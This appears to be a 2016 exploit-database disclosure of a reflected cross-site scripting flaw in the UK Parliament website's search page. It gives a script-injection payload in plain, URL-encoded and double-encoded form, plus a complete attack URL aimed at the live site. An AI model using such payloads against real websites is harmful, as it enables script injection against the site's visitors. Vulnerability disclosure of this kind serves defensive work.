Parliament of the United Kingdom XSS Vulnerability

2016.09.27
Credit: 4TT4CK3R
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Description from WikiPedia : ---------------------------------- The Parliament of the United Kingdom of Great Britain and Northern Ireland, commonly known as the UK Parliament or British Parliament, is the supreme legislative body in the United Kingdom, British Crown dependencies and British overseas territories. It alone possesses legislative supremacy and thereby ultimate power over all other political bodies in the UK and its territories. Its head is the Sovereign of the United Kingdom (currently Queen Elizabeth II) and its seat is the Palace of Westminster in the City of Westminster, London. [-] Exploit Title : ---------------------- Parliament of the United Kingdom XSS Vulnerability [-] Date : ------------- 2016-09-26 (Submit Date) [-] Exploit Author : ----------------------- 4TT4CK3R [-] Tested on : ----------------- Firefox , Ubuntu [-] Home Page : ------------------ https://www.parliament.uk [-] Vulnerable Address : -------------------------- https://www.parliament.uk/search/results/ [-] Description of vulnerability : ------------------------------------- Recently we discovered XSS vulnerability on the www.parliament.uk. if you want to search any string on the website , this website printed your searched string in the url and you can change it from here. ok .. we can pentesting XSS vulnerability on this website. For doing this pentesting we can using more bypass methods of this vulnerability. For example we searching "HellO" string. URL of websited changed to this type : https://www.parliament.uk/search/results/?q=HellO ok. now we can running xss scripts with different bypass methods of this vulnerabuility. We can use 'head' bypass method and also 'Encoding' our script for pentesting xss vulnerability on this website ... Therefore : if our script be : ">head<script>alert('HellO')</script>head">" Then we must Encode this script that result is : %22%3E%68%65%61%64%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%48%65%6C%6C%4F%27%29%3C%2F%73%63%72%69%70%74%3E%68%65%61%64%22%3E%22%00 Now use Encoded script on this website : https://www.parliament.uk/search/results/?q=%2522%253E%2568%2565%2561%2564%253C%2573%2563%2572%2569%2570%2574%253E%2561%256C%2565%2572%2574%2528%2527%2548%2565%256C%256C%254F%2527%2529%253C%252F%2573%2563%2572%2569%2570%2574%253E%2568%2565%2561%2564%2522%253E%2522%2500&__cf_waf_tk__=007990002B2cYZgm1bcmnxNL4Ep2na0Wa66k [-] ScreenShot : -------------------- https://s10.postimg.org/682t07h5l/121212.jpg https://s10.postimg.org/uoe7kxnbd/image.jpg [-] Exploited by : --------------------- 4TT4CK3R

References:

https://s10.postimg.org/682t07h5l/121212.jpg
https://s10.postimg.org/uoe7kxnbd/image.jpg


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top